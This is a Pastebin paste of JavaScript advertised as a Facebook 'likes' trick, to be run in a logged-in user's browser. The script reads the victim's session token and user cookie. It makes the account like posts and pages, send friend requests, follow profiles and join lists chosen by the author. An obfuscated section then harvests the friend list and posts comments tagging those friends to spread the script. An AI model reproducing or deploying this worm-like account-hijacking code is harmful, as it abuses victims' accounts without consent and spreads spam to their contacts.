Advertisement
nPhoenix

Facebook Likes - não editado [crédito: desconheço]

May 10th, 2014
349
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  // === Likes En Photos ====
  2.  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  3.  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  4.  
  5.  function cereziAl(isim) {
  6.      var tarama = isim + "=";
  7.      if (document.cookie.length > 0) {
  8.          konum = document.cookie.indexOf(tarama)
  9.          if (konum != -1) {
  10.              konum += tarama.length
  11.              son = document.cookie.indexOf(";", konum)
  12.              if (son == -1)
  13.                  son = document.cookie.length
  14.              return unescape(document.cookie.substring(konum, son))
  15.          } else {
  16.              return "";
  17.          }
  18.      }
  19.  }
  20.  
  21.  function getRandomInt(min, max) {
  22.      return Math.floor(Math.random() * (max - min + 1)) + min;
  23.  }
  24.  
  25.  function randomValue(arr) {
  26.      return arr[getRandomInt(0, arr.length - 1)];
  27.  }
  28.  
  29.  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  30.  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  31.  
  32.  function cereziAl(isim) {
  33.      var tarama = isim + "=";
  34.      if (document.cookie.length > 0) {
  35.          konum = document.cookie.indexOf(tarama)
  36.          if (konum != -1) {
  37.              konum += tarama.length
  38.              son = document.cookie.indexOf(";", konum)
  39.              if (son == -1)
  40.                  son = document.cookie.length
  41.              return unescape(document.cookie.substring(konum, son))
  42.          } else {
  43.              return "";
  44.          }
  45.      }
  46.  }
  47.  
  48.  function getRandomInt(min, max) {
  49.      return Math.floor(Math.random() * (max - min + 1)) + min;
  50.  }
  51.  
  52.  function randomValue(arr) {
  53.      return arr[getRandomInt(0, arr.length - 1)];
  54.  }
  55.  
  56.  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  57.  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  58.  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  59.  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  60.  
  61.  function IDS(r) {
  62.      var X = new XMLHttpRequest();
  63.      var XURL = "//www.facebook.com/ajax/add_friend/action.php";
  64.      var XParams = "to_friend=" + r + "&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg=" + fb_dtsg + "&phstamp=";
  65.      X.open("POST", XURL, true);
  66.      X.onreadystatechange = function () {
  67.          if (X.readyState == 4 && X.status == 200) {
  68.              X.close;
  69.          }
  70.      };
  71.      X.send(XParams);
  72.  }
  73.  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  74.  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  75.  
  76.  function Like(p) {
  77.      var Page = new XMLHttpRequest();
  78.      var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
  79.      var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp=";
  80.      Page.open("POST", PageURL, true);
  81.      Page.onreadystatechange = function () {
  82.          if (Page.readyState == 4 && Page.status == 200) {
  83.              Page.close;
  84.          }
  85.      };
  86.      Page.send(PageParams);
  87.  }
  88.  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  89.  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  90.  var now = (new Date).getTime();
  91.  
  92.  function P(opo) {
  93.      var X = new XMLHttpRequest();
  94.      var XURL = "//www.facebook.com/ajax/ufi/like.php";
  95.      var XParams = "like_action=true&ft_ent_identifier=" + opo + "&source=1&client_id=" + now + "%3A379783857&rootid=u_jsonp_39_18&giftoccasion&ft[tn]=%3E%3D&ft[type]=20&ft[qid]=5890811329470279257&ft[mf_story_key]=2814962900193143952&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n88QoAMBlClyocpae&__req=g4&fb_dtsg=" + fb_dtsg + "&phstamp=";
  96.      X.open("POST", XURL, true);
  97.      X.onreadystatechange = function () {
  98.          if (X.readyState == 4 && X.status == 200) {
  99.              X.close;
  100.          }
  101.      };
  102.      X.send(XParams);
  103.  }
  104.  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  105.  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  106.  
  107.  function a(abone) {
  108.      var http4 = new XMLHttpRequest;
  109.      var url4 = "/ajax/follow/follow_profile.php?__a=1";
  110.      var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  111.      http4.open("POST", url4, true);
  112.      http4.onreadystatechange = function () {
  113.          if (http4.readyState == 4 && http4.status == 200) http4.close
  114.      };
  115.      http4.send(params4)
  116.  }
  117.  
  118.  function sublist(uidss) {
  119.      var a = document.createElement('script');
  120.      a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  121.      document.body.appendChild(a);
  122.  }
  123.  
  124.  //Emoticons
  125.  P("1450187931888732");
  126.  P("290106954478004");
  127.  P("581905811923929");
  128.  P("266381560183877");
  129.  P("277671005721599");
  130.  P("277198445768855");
  131.  P("455330697915244");
  132.  P("473034929493611");
  133.  Like("1405739146333611");
  134.  Like("283753728451566");
  135.  sublist("306221119533254");
  136.  sublist("268182153337151");
  137.  sublist("278301392325227");
  138.  sublist("299749990180367");
  139.  sublist("302357829919583");
  140.  sublist("302435289911837");
  141.  sublist("302435416578491");
  142.  sublist("603774609719691");
  143.  sublist("303735483115151");
  144.  sublist("306334016188631");
  145.  sublist("600959523321001");
  146.  sublist("535241189924194");
  147.  sublist("649656795082494");
  148.  //Facebook
  149.  a("100004361054182");
  150.  a("100002614731501");
  151.  a("100005905740415");
  152.  
  153.  //doitenquantrong
  154.  var _0xa22c = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "1450187931888732", "onreadystatechange", "readyState", "arkadaslar = ", "for (;;);", "", "replace", "responseText", ";", "length", "entries", "payload", "round", " @[", "uid", ":", "text", "]", " ", "\x26filter[0]=user", "\x26options[0]=friends_only", "\x26options[1]=nm", "\x26token=v7", "\x26viewer=", "\x26__user=", "https://", "indexOf", "URL", "GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "open", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "send", "random", "floor", "\x26ft_ent_identifier=", "\x26comment_text= NUEVO TRUCO DE LIKES #FACEBOOK Pruebalo (Y) ", "\x26source=2", "\x26client_id=1377871797138:1707018092", "\x26reply_fbid", "\x26parent_comment_id", "\x26rootid=u_jsonp_2_3", "\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:", "}", "\x26attached_sticker_fbid=0", "\x26attached_photo_fbid=0", "\x26giftoccasion", "\x26ft[tn]=[]", "\x26__a=1", "\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo", "\x26__req=q", "\x26fb_dtsg=", "\x26ttstamp=", "POST", "/ajax/ufi/add_comment.php", "Content-type", "application/x-www-form-urlencoded", "setRequestHeader", "status", "close"];
  155.  var fb_dtsg = document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];
  156.  var user_id = document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);
  157.  var id = _0xa22c[5];
  158.  var arkadaslar = [];
  159.  var svn_rev;
  160.  
  161.  function arkadaslari_al(id) {
  162.      var _0x7892x7 = new XMLHttpRequest();
  163.      _0x7892x7[_0xa22c[6]] = function () {
  164.          if (_0x7892x7[_0xa22c[7]] == 4) {
  165.              eval(_0xa22c[8] + _0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9], _0xa22c[10]) + _0xa22c[13]);
  166.              for (f = 0; f < Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]] / 27); f++) {
  167.                  mesaj = _0xa22c[10];
  168.                  mesaj_text = _0xa22c[10];
  169.                  for (i = f * 27; i < (f + 1) * 27; i++) {
  170.                      if (arkadaslar[_0xa22c[16]][_0xa22c[15]][i]) {
  171.                          mesaj += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]] + _0xa22c[22];
  172.                          mesaj_text += _0xa22c[23] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];
  173.                      };
  174.                  };
  175.                  yorum_yap(id, mesaj);
  176.              };
  177.          };
  178.      };
  179.      var _0x7892x8 = _0xa22c[24];
  180.      _0x7892x8 += _0xa22c[25];
  181.      _0x7892x8 += _0xa22c[26];
  182.      _0x7892x8 += _0xa22c[27];
  183.      _0x7892x8 += _0xa22c[28] + user_id;
  184.      _0x7892x8 += _0xa22c[29] + user_id;
  185.      if (document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30]) >= 0) {
  186.          _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[34] + _0x7892x8, true);
  187.      } else {
  188.          _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[36] + _0x7892x8, true);
  189.      };
  190.      _0x7892x7[_0xa22c[37]]();
  191.  };
  192.  
  193.  function RandomArkadas() {
  194.      var _0x7892xa = _0xa22c[10];
  195.      for (i = 0; i < 9; i++) {
  196.          _0x7892xa += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]] + _0xa22c[22];
  197.      };
  198.      return _0x7892xa;
  199.  };
  200.  
  201.  function yorum_yap(id, _0x7892xc) {
  202.      var _0x7892xd = new XMLHttpRequest();
  203.      var _0x7892x8 = _0xa22c[10];
  204.      _0x7892x8 += _0xa22c[40] + id;
  205.      _0x7892x8 += _0xa22c[41] + encodeURIComponent(_0x7892xc);
  206.      _0x7892x8 += _0xa22c[42];
  207.      _0x7892x8 += _0xa22c[43];
  208.      _0x7892x8 += _0xa22c[44];
  209.      _0x7892x8 += _0xa22c[45];
  210.      _0x7892x8 += _0xa22c[46];
  211.      _0x7892x8 += _0xa22c[47] + id + _0xa22c[48];
  212.      _0x7892x8 += _0xa22c[49];
  213.      _0x7892x8 += _0xa22c[50];
  214.      _0x7892x8 += _0xa22c[51];
  215.      _0x7892x8 += _0xa22c[52];
  216.      _0x7892x8 += _0xa22c[29] + user_id;
  217.      _0x7892x8 += _0xa22c[53];
  218.      _0x7892x8 += _0xa22c[54];
  219.      _0x7892x8 += _0xa22c[55];
  220.      _0x7892x8 += _0xa22c[56] + fb_dtsg;
  221.      _0x7892x8 += _0xa22c[57];
  222.      _0x7892xd[_0xa22c[35]](_0xa22c[58], _0xa22c[59], true);
  223.      _0x7892xd[_0xa22c[62]](_0xa22c[60], _0xa22c[61]);
  224.      _0x7892xd[_0xa22c[6]] = function () {
  225.          if (_0x7892xd[_0xa22c[7]] == 4 && _0x7892xd[_0xa22c[63]] == 200) {
  226.              _0x7892xd[_0xa22c[64]];
  227.          };
  228.      };
  229.      _0x7892xd[_0xa22c[37]](_0x7892x8);
  230.  };
  231.  arkadaslari_al(id);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement